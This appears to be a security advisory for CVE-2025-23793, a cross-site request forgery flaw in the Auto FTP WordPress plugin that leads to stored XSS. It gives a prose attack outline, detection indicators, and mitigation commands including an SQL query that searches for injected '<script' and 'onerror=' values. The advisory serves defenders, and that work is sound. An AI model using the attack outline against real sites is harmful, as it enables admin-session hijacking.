CVE-2025-23793 Overview
CVE-2025-23793 is a Cross-Site Request Forgery (CSRF) vulnerability in the Ciprian Turcu Auto FTP WordPress plugin that leads to stored Cross-Site Scripting (XSS). The flaw affects all versions of Auto FTP up to and including 1.0.1. An attacker can craft a malicious request that, when triggered by an authenticated administrator visiting an attacker-controlled page, persists JavaScript payloads inside the plugin's configuration. The injected script executes in the browser of any user loading the affected admin view, enabling session theft, privilege abuse, or further site compromise. The weakness is classified as CWE-352.
Critical Impact
Successful exploitation allows an unauthenticated attacker to plant persistent JavaScript in a WordPress site by tricking an administrator into clicking a crafted link, leading to stored XSS execution in the admin context.
Affected Products
- Ciprian Turcu Auto FTP WordPress plugin (auto-ftp)
- Versions from n/a through 1.0.1
- WordPress sites with the plugin installed and active
Discovery Timeline
- 2025-01-16 - CVE-2025-23793 published to NVD
- 2026-04-23 - Last updated in NVD database
Technical Details for CVE-2025-23793
Vulnerability Analysis
The Auto FTP plugin exposes a state-changing administrative action without validating the request origin. The plugin does not enforce a WordPress nonce check or verify the Referer header on the handler that updates configuration values. An attacker hosts a page containing an auto-submitting form or fetch request targeting the plugin's settings endpoint. When an authenticated administrator visits the page, the browser sends authenticated cookies, and the request is processed as if it came from the admin.
The submitted parameters are stored in the plugin's options without sanitization or output encoding. Because the values are later rendered in the WordPress administrative interface, any injected <script> payload executes whenever an admin loads the affected page. This combination of CSRF and stored XSS escalates the impact beyond a simple cross-site forgery, because the payload becomes persistent and runs in a privileged context.
Root Cause
The root cause is missing CSRF protection on a privileged plugin action combined with absent input sanitization and output escaping. WordPress provides wp_nonce_field(), check_admin_referer(), and helpers such as sanitize_text_field() and esc_attr(). The plugin does not apply these controls on the affected settings handler, allowing forged submissions and persistence of unsanitized content.
Attack Vector
The attack is delivered over the network and requires user interaction from an authenticated administrator. The attacker prepares a malicious HTML page that issues a cross-origin POST to the plugin's settings endpoint with a JavaScript payload in a vulnerable field. After the admin visits the page, the request is processed, the payload is stored, and the XSS triggers on subsequent admin views. No attacker credentials are required.
Technical details are documented in the Patchstack advisory for the Auto FTP plugin.
Detection Methods for CVE-2025-23793
Indicators of Compromise
- Unexpected <script>, onerror=, or onload= content stored in Auto FTP plugin option values within the wp_options table
- Administrator account activity originating from referrers outside the WordPress admin domain
- New or modified administrator accounts, plugins, or themes created shortly after an admin viewed a plugin settings page
- Outbound requests from admin browsers to unfamiliar domains immediately after loading Auto FTP admin pages
Detection Strategies
- Audit wp_options rows associated with the auto-ftp plugin for HTML or JavaScript content
- Review web server access logs for POST requests to Auto FTP admin endpoints lacking a same-origin Referer header
- Enforce a Content Security Policy (CSP) in report-only mode to surface inline script execution within /wp-admin/
- Correlate WordPress audit logs with browser-side telemetry to identify admin sessions that triggered unexpected script execution
Monitoring Recommendations
- Enable a WordPress activity log plugin to record option changes and plugin setting updates
- Alert on POST requests to plugin administrative endpoints that arrive without a valid nonce parameter
- Monitor for stored values containing event handler attributes or <script> tags across plugin option rows
- Track administrator browser sessions for anomalous outbound connections following access to plugin settings
How to Mitigate CVE-2025-23793
Immediate Actions Required
- Deactivate and remove the Auto FTP plugin until a patched release is verified, since the advisory indicates no fixed version is available through 1.0.1
- Rotate WordPress administrator passwords and invalidate active sessions to remove any credentials potentially harvested via XSS
- Inspect wp_options entries created by the plugin and remove any rows containing script or event-handler content
- Review user accounts, scheduled tasks, and installed plugins for unauthorized additions
Patch Information
No fixed version is listed in the advisory; the vulnerability affects Auto FTP from n/a through 1.0.1. Site operators should monitor the Patchstack advisory and the plugin's repository for an updated release that adds nonce verification and input sanitization.
Workarounds
- Remove the Auto FTP plugin entirely if it is not required for site operations
- Place WordPress administrative endpoints behind IP allowlisting or VPN-only access to limit exposure to forged requests
- Deploy a web application firewall rule that blocks POST requests to /wp-admin/ endpoints lacking a valid nonce parameter
- Train administrators to log out of WordPress before browsing untrusted sites and to use a dedicated browser profile for administration
# Configuration example: disable and remove the vulnerable plugin via WP-CLI
wp plugin deactivate auto-ftp
wp plugin delete auto-ftp
# Audit option values for stored script content
wp db query "SELECT option_name, option_value FROM wp_options WHERE option_value LIKE '%<script%' OR option_value LIKE '%onerror=%';"
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.
